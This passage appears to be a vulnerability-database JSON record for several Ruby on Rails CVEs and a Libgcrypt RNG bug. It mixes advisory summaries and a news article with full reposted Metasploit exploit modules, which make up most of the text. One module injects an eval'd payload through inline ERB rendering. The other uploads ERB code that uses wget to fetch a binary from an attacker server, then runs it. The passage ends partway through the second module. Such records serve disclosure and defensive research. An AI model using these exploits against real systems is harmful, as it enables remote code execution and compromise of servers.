"cvelist": ["CVE-2016-6316"], "modified": "2021-11-08T23:52:14", "id": "RH:CVE-2016-6316", "href": "https://access.redhat.com/security/cve/cve-2016-6316", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:54", "description": "New versions of Libgcrypt and Gnu Privacy Guard (GnuPG or GPG) released on Wednesday include security fixes for vulnerabilities discovered in the mixing functions of the Libgcrypt random number generator.\n\nThe flaws were privately disclosed by Felix D\u00f6rre and Vladimir Klebanov of Karlsruhe Institute of Technology in Germany, and according to an [advisory](<http://lists.gnu.org/archive/html/info-gnu/2016-08/msg00008.html>) from the GnuPG Project, the bug has been in all GnuPG and Libgcrypt versions since 1998.\n\n\u201cAn attacker who obtains 4640 bits from the RNG can trivially predict the next 160 bits of output,\u201d said Werner Koch, who wrote GPG in 1997.\n\nGPG is a free implementation of OpenPGP, and is used by applications to encrypt and digitally sign data and communication between parties. Libgcrypt is the crypto library used by GPG since version 2.x.\n\nKoch wrote yesterday that all versions on all platforms are affected by the vulnerability.\n\n\u201cA first analysis on the impact of this bug in GnuPG shows that existing RSA keys are not weakened. For DSA and Elgamal keys it is also unlikely that the private key can be predicted from other public information,\u201d Koch wrote in the advisory. \u201cThis needs more research and I would suggest not to overhasty revoke keys.\u201d\n\nA request for additional comment from Koch was not returned in time for publication.\n\nUsers are advised to either wait for a vendor patch, or for home-grown applications using GPG 2.0.x or 2.1.x, Libgcrypt should be updated. For earlier versions of GPG such as 1.4.x, users are urged to immediately update to GPG 1.4.21.\n\nKoch\u2019s financial struggles in keeping GPG afloat were in the news more than a year ago after a [profile](<https://www.propublica.org/article/the-worlds-email-encryption-software-relies-on-one-guy-who-is-going-broke>) in Pro Publica. At the time, the project was running out of money after a fund-raising effort raised $43,000, well short of the $137,000 Koch was hoping for. Koch wanted the money to boost his own salary and hire a developer.\n\nShortly after the Pro Publica article went live, donations poured in to GPG to the tune of [\u20ac120,000 from the Core Infrastructure Initiative and individual donors](<https://threatpost.com/security-tech-communities-rally-to-support-gnupg/110894/>).\n\n\u201cAs the main author of GnuPG, I like to thank everyone for supporting the project, be it small or large individual donations, helping users, providing corporate sponsorship, working on the software, and for all the encouraging words,\u201d Koch said at the time.\n", "cvss3": {}, "published": "2016-08-18T12:39:21", "type": "threatpost", "title": "GPG Patches 18-Year-Old Libgcrypt RNG Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-6316"], "modified": "2016-08-23T18:56:40", "id": "THREATPOST:82E1359D397101F2CCA1968657708DB7", "href": "https://threatpost.com/gpg-patches-18-year-old-libgcrypt-rng-bug/119984/", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "gitlab": [{"lastseen": "2022-06-09T23:06:28", "description": "There is a possible XSS vulnerability in Action View. Text declared as \"HTML safe\" will not have quotes escaped when used as attribute values in tag helpers.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-09-07T00:00:00", "type": "gitlab", "title": "Possible XSS Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2016-09-07T00:00:00", "id": "GITLAB-4592157653D70634A228B2043D8242B2", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/gem%2Factionview%2FCVE-2016-6316.yml/raw", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-09T23:06:26", "description": "Applications that pass unverified user input to the `render` method in a controller may be vulnerable to an information leak vulnerability. Impacted code will look something like this: ``` def index; render params[:id]; end ``` Carefully crafted requests can cause the above code to render files from unexpected places like outside the application's view directory, and can possibly escalate this to a remote code execution attack.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-04-07T00:00:00", "type": "gitlab", "title": "Possible Information Leak Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2097"], "modified": "2016-04-07T00:00:00", "id": "GITLAB-5AFFD2F604C9B362DF159A3A4228C4BC", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/gem%2Factionview%2FCVE-2016-2097.yml/raw", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-06-09T23:06:24", "description": "Applications that pass unverified user input to the `render` method in a controller may be vulnerable to an information leak vulnerability. Carefully crafted requests can render files from unexpected places like outside the application's view directory, and can possibly escalate this to a remote code execution attack. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-15T00:00:00", "type": "gitlab", "title": "Possible Information Leak Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2016-02-15T00:00:00", "id": "GITLAB-9ADCD46F0341E983FC7C5F296E742944", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/gem%2Factionview%2FCVE-2016-0752.yml/raw", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:53", "description": "", "cvss3": {}, "published": "2016-07-09T00:00:00", "type": "packetstorm", "title": "Ruby On Rails ActionPack Inline ERB Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2016-07-09T00:00:00", "id": "PACKETSTORM:137834", "href": "https://packetstormsecurity.com/files/137834/Ruby-On-Rails-ActionPack-Inline-ERB-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Ruby on Rails ActionPack Inline ERB Code Execution', \n'Description' => %q{ \nThis module exploits a remote code execution vulnerability in the \ninline request processor of the Ruby on Rails ActionPack component. \nThis vulnerability allows an attacker to process ERB to the inline \nJSON processor, which is then rendered, permitting full RCE within \nthe runtime, without logging an error condition. \n}, \n'Author' => \n[ \n'RageLtMan <rageltman[at]sempervictus>' \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2016-2098' ] \n], \n'Platform' => 'ruby', \n'Arch' => ARCH_RUBY, \n'Privileged' => false, \n'Targets' => [ ['Automatic', {} ] ], \n'DisclosureDate' => 'Mar 1 2016', \n'DefaultOptions' => { \n\"PrependFork\" => true \n}, \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(80), \nOptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', \"/\"]), \nOptString.new('TARGETPARAM', [ true, 'The target parameter to inject with inline code', 'id']) \n], self.class) \n \nend \n \ndef json_request \ncode = Rex::Text.encode_base64(payload.encoded) \nreturn { \ndatastore['TARGETPARAM'] => {\"inline\" => \"<%= eval(%[#{code}].unpack(%[m0])[0]) %>\"} \n}.to_json \nend \n \ndef exploit \nprint_status(\"Sending inline code to parameter: #{datastore['TARGETPARAM']}\") \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path), \n'method' => 'GET', \n'ctype' => 'application/json', \n'headers' => { \n'Accept' => 'application/json' \n}, \n'data' => json_request \n}, 25) \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/137834/rails_actionpack_inline_exec.rb.txt"}, {"lastseen": "2016-12-05T22:13:03", "description": "", "cvss3": {}, "published": "2016-10-13T00:00:00", "type": "packetstorm", "title": "Ruby on Rails Dynamic Render File Upload Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-0752"], "modified": "2016-10-13T00:00:00", "id": "PACKETSTORM:139143", "href": "https://packetstormsecurity.com/files/139143/Ruby-on-Rails-Dynamic-Render-File-Upload-Remote-Code-Execution.html", "sourceData": "`require 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution', \n'Description' => %q{ \nThis module exploits a remote code execution vulnerability in the explicit render \nmethod when leveraging user parameters. \nThis module has been tested across multiple versions of Ruby on Rails. \nThe technique used by this module requires the specified \nendpoint to be using dynamic render paths, such as the following example: \n \ndef show \nrender params[:id] \nend \n \nAlso, the vulnerable target will need a POST endpoint for the TempFile upload, this \ncan literally be any endpoint. This module doesnt use the log inclusion method of \nexploitation due to it not being universal enough. Instead, a new code injection \ntechnique was found and used whereby an attacker can upload temporary image files \nagainst any POST endpoint and use them for the inclusion attack. Finally, you only \nget one shot at this if you are testing with the builtin rails server, use caution. \n}, \n'Author' => \n[ \n'mr_me <mr_me@offensive-security.com>', # necromanced old bug & discovered new vector rce vector \n'John Poulin (forced-request)' # original render bug finder \n], \n'References' => \n[ \n[ 'CVE', '2016-0752'], \n[ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch \n[ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016 \n[ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit \n], \n'License' => MSF_LICENSE, \n'Platform' => ['linux', 'bsd'], \n'Arch' => ARCH_X86, \n'Payload' => \n{ \n'DisableNops' => true, \n}, \n'Privileged' => false, \n'Targets' => \n[ \n[ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Oct 16 2016')) \nregister_options( \n[ \nOpt::RPORT(3000), \nOptString.new('URIPATH', [ true, 'The path to the vulnerable route', \"/users\"]), \nOptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]), \n], self.class) \nend \n \ndef check \n \n# this is the check for the dev environment \nres = send_request_cgi({ \n'uri' => normalize_uri(datastore['URIPATH'], \"%2f\"), \n'method' => 'GET', \n}, 60) \n \n# if the page controller is dynamically rendering, its for sure vuln \nif res and res.body =~ /render params/ \nreturn CheckCode::Vulnerable \nend \n \n# this is the check for the prod environment \nres = send_request_cgi({ \n'uri' => normalize_uri(datastore['URIPATH'], \"%2fproc%2fself%2fcomm\"), \n'method' => 'GET', \n}, 60) \n \n# if we can read files, its likley we can execute code \nif res and res.body =~ /ruby/ \nreturn CheckCode::Appears \nend \nreturn CheckCode::Safe \nend \n \ndef on_request_uri(cli, request) \nif (not @pl) \nprint_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\") \nreturn \nend \nprint_status(\"#{rhost}:#{rport} - Sending the payload to the server...\") \n@elf_sent = true \nsend_response(cli, @pl) \nend \n \ndef send_payload \n@bd = rand_text_alpha(8+rand(8)) \nfn = rand_text_alpha(8+rand(8)) \nun = rand_text_alpha(8+rand(8)) \npn = rand_text_alpha(8+rand(8)) \nregister_file_for_cleanup(\"/tmp/#{@bd}\") \ncmd = \"wget #{@service_url} -O /tmp/#{@bd};\" \ncmd << \"chmod 755 /tmp/#{@bd};\" \ncmd << \"/tmp/#{@bd}\" \npay = \"<%=`#{cmd}`%>\" \nprint_status(\"uploading image...\") \ndata = Rex::MIME::Message.new \ndata.add_part(pay, nil, nil, 'form-data; name=\"#{un}\"; filename=\"#{fn}.gif\"') \nres = send_request_cgi({ \n'method' => 'POST', \n'cookie' => @cookie, \n'uri' => normalize_uri(datastore['URIPATH'], pn), \n'ctype' => \"multipart/form-data; boundary=#{data.bound}\", \n'data' => data.to_s \n}) \nif res and res.code == 422 and res.body =~ /Tempfile:\\/(.*)>/ \n@path = \"#{$1}\" if res.body =~ /Tempfile:\\/(.*)>/ \nreturn true \nelse \n \n# this is where we pull the log file \nif leak_log \nreturn true \nend \nend \nreturn false \nend \n \ndef leak_log \n \n# path to the log /proc/self/fd/7 \n# this bypasses the extension check \nres = send_request_cgi({ \n'uri' => normalize_uri(datastore['URIPATH'], \"proc%2fself%2ffd%2f7\"), \n'method' => 'GET', \n}, 60) \n \nif res and res.code == 200 and res.body =~ /Tempfile:\\/(.*)>, @original_filename=/ \n@path = \"#{$1}\" if res.body =~ /Tempfile:\\/(.*)>, @original_filename=/ \nreturn true \nend \nreturn false \nend \n \ndef start_http_server \n@pl = generate_payload_exe \n@elf_sent = false \ndownfile = rand_text_alpha(8+rand(8)) \nresource_uri = '/' + downfile \nif (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\") \nsrv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost) \nelse \nsrv_host = datastore['SRVHOST'] \nend \n \n# do not use SSL for the attacking web server \nif datastore['SSL'] \nssl_restore = true \ndatastore['SSL'] = false \nend \n \n@service_url = \"http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}\" \nservice_url_payload = srv_host + resource_uri \nprint_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\") \nstart_service({'Uri' => { \n'Proc' => Proc.new { |cli, req| \non_request_uri(cli, req) \n}, \n'Path' => resource_uri \n}}) \ndatastore['SSL'] = true if ssl_restore \nconnect \nend \n \ndef render_tmpfile \n@path.gsub!(/\\//, '%2f') \nres = send_request_cgi({ \n'uri' => normalize_uri(datastore['URIPATH'], @path), \n'method' => 'GET', \n}, 1) \nend \n \ndef exploit \nprint_status(\"Sending initial request to detect exploitability\") \nstart_http_server \nif send_payload \nprint_good(\"injected payload\") \nrender_tmpfile \n \n# we need to delay, for the stager \nselect(nil, nil, nil, 5) \nend \nend \nend \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139143/rails_dynamic_render_code_exec.rb.txt"}], "checkpoint_advisories": [{"lastseen": "2022-10-26T15:04:54", "description": "A remote code execution vulnerability exists in Ruby on Rails. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-07-19T00:00:00", "type": "checkpoint_advisories", "title": "Ruby on Rails Remote Code Execution (CVE-2016-2098)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2022-10-26T00:00:00", "id": "CPAI-2016-0626", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-19T18:07:49", "description": "A directory traversal vulnerability exists in Ruby on Rails. Successful exploitation of this vulnerability could allow an attacker to access arbitrary files on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-19T00:00:00", "type": "checkpoint_advisories", "title": "Ruby On Rails Directory Traversal (CVE-2016-0752)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2022-04-19T00:00:00", "id": "CPAI-2016-1173", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "canvas": [{"lastseen": "2021-07-28T14:33:32", "description": "**Name**| rails_actionpack_render \n---|--- \n**CVE**| CVE-2016-2098 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| rails_actionpack_render \n**Notes**| CVE Name: CVE-2016-2098 \nVENDOR: http://rubyonrails.org \nNotes: \n \nThis vulnerability affects ActionPack gem and it allows remote attackers to execute arbitrary Ruby Code due to the unsafe use of the 'render' method. Web applications that pass unverified user input to the 'render' method in a controller or a view could be vulnerable to code injection. \nThe first issue here is that the 'render' method accepts a hash parameter as input parameter. The second issue is triggered when the method receives a hash parameter with a key named as one of the render options such as html, plain, inline, etc. The method uses it in the same way as 'render key: value', for example if you use { 'plain' : 'HELLO' } as a parameter this is the same as calling 'render plain: \"HELLO\"'. Using { 'inline' : '' } will give you code execution. \nThe POST parameters seem to be non exploitable to this vulnerability due to the post_params method that checks all parameters against a whitelist. \n \n \nRepeatability: Infinite \nCVE URL: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-2098 \nCVSS: 7.5 \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-04-07T23:59:00", "type": "canvas", "title": "Immunity Canvas: RAILS_ACTIONPACK_RENDER", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2016-04-07T23:59:00", "id": "RAILS_ACTIONPACK_RENDER", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/rails_actionpack_render", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-04-11T11:51:47", "description": "Exploit for ruby platform in category remote exploits", "cvss3": {}, "published": "2016-07-11T00:00:00", "type": "zdt", "title": "Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2016-07-11T00:00:00", "id": "1337DAY-ID-25434", "href": "https://0day.today/exploit/description/25434", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n include Msf::Exploit::Remote::HttpClient\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Ruby on Rails ActionPack Inline ERB Code Execution',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vulnerability in the\r\n inline request processor of the Ruby on Rails ActionPack component.\r\n This vulnerability allows an attacker to process ERB to the inline\r\n JSON processor, which is then rendered, permitting full RCE within\r\n the runtime, without logging an error condition.\r\n },\r\n 'Author' =>\r\n [\r\n 'RageLtMan <rageltman[at]sempervictus>'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-2098' ]\r\n ],\r\n 'Platform' => 'ruby',\r\n 'Arch' => ARCH_RUBY,\r\n 'Privileged' => false,\r\n 'Targets' => [ ['Automatic', {} ] ],\r\n 'DisclosureDate' => 'Mar 1 2016',\r\n 'DefaultOptions' => {\r\n \"PrependFork\" => true\r\n },\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n Opt::RPORT(80),\r\n OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', \"/\"]),\r\n OptString.new('TARGETPARAM', [ true, 'The target parameter to inject with inline code', 'id'])\r\n ], self.class)\r\n \r\n end\r\n \r\n def json_request\r\n code = Rex::Text.encode_base64(payload.encoded)\r\n return {\r\n datastore['TARGETPARAM'] => {\"inline\" => \"<%= eval(%[#{code}].unpack(%[m0])[0]) %>\"}\r\n }.to_json\r\n end\r\n \r\n def exploit\r\n print_status(\"Sending inline code to parameter: #{datastore['TARGETPARAM']}\")\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path),\r\n 'method' => 'GET',\r\n 'ctype' => 'application/json',\r\n 'headers' => {\r\n 'Accept' => 'application/json'\r\n },\r\n 'data' => json_request\r\n }, 25)\r\n end\r\nend\n\n# 0day.today [2018-04-11] #", "sourceHref": "https://0day.today/exploit/25434", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-01T07:18:13", "description": "This Metasploit module exploits a remote code execution vulnerability in the explicit render method when leveraging user parameters. This Metasploit module has been tested across multiple versions of Ruby on Rails. The technique used by this module requires the specified endpoint to be using dynamic render paths. Also, the vulnerable target will need a POST endpoint for the TempFile upload, this can literally be any endpoint. This Metasploit module does not use the log inclusion method of exploitation due to it not being universal enough. Instead, a new code injection technique was found and used whereby an attacker can upload temporary image files against any POST endpoint and use them for the inclusion attack. Finally, you only get one shot at this if you are testing with the builtin rails server, use caution.", "cvss3": {}, "published": "2016-10-15T00:00:00", "type": "zdt", "title": "Ruby on Rails Dynamic Render File Upload Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-0752"], "modified": "2016-10-15T00:00:00", "id": "1337DAY-ID-25576", "href": "https://0day.today/exploit/description/25576", "sourceData": "require 'msf/core'\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vulnerability in the explicit render\r\n method when leveraging user parameters.\r\n This module has been tested across multiple versions of Ruby on Rails.\r\n The technique used by this module requires the specified\r\n endpoint to be using dynamic render paths, such as the following example:\r\n\r\n def show\r\n render params[:id]\r\n end\r\n\r\n Also, the vulnerable target will need a POST endpoint for the TempFile upload, this\r\n can literally be any endpoint. This module doesnt use the log inclusion method of\r\n exploitation due to it not being universal enough. Instead, a new code injection\r\n technique was found and used whereby an attacker can upload temporary image files\r\n against any POST endpoint and use them for the inclusion attack. Finally, you only\r\n get one shot at this if you are testing with the builtin rails server, use caution.\r\n },\r\n 'Author' =>\r\n [\r\n 'mr_me <[email\u00a0protected]>', # necromanced old bug & discovered new vector rce vector\r\n 'John Poulin (forced-request)' # original render bug finder\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2016-0752'],\r\n [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch\r\n [ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016\r\n [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => ['linux', 'bsd'],\r\n 'Arch' => ARCH_X86,\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n },\r\n 'Privileged' => false,\r\n 'Targets' =>\r\n [\r\n [ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Oct 16 2016'))\r\n register_options(\r\n [\r\n Opt::RPORT(3000),\r\n OptString.new('URIPATH', [ true, 'The path to the vulnerable route', \"/users\"]),\r\n OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),\r\n ], self.class)\r\n end\r\n\r\n def check\r\n\r\n # this is the check for the dev environment\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], \"%2f\"),\r\n 'method' => 'GET',\r\n }, 60)\r\n\r\n # if the page controller is dynamically rendering, its for sure vuln\r\n if res and res.body =~ /render params/\r\n return CheckCode::Vulnerable\r\n end\r\n\r\n # this is the check for the prod environment\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], \"%2fproc%2fself%2fcomm\"),\r\n 'method' => 'GET',\r\n }, 60)\r\n\r\n # if we can read files, its likley we can execute code\r\n if res and res.body =~ /ruby/\r\n return CheckCode::Appears\r\n end\r\n return CheckCode::Safe\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n if (not @pl)\r\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\r\n return\r\n end\r\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\r\n @elf_sent = true\r\n send_response(cli, @pl)\r\n end\r\n\r\n def send_payload\r\n @bd = rand_text_alpha(8+rand(8))\r\n fn = rand_text_alpha(8+rand(8))\r\n un = rand_text_alpha(8+rand(8))\r\n pn = rand_text_alpha(8+rand(8))\r\n register_file_for_cleanup(\"/tmp/#{@bd}\")\r\n cmd = 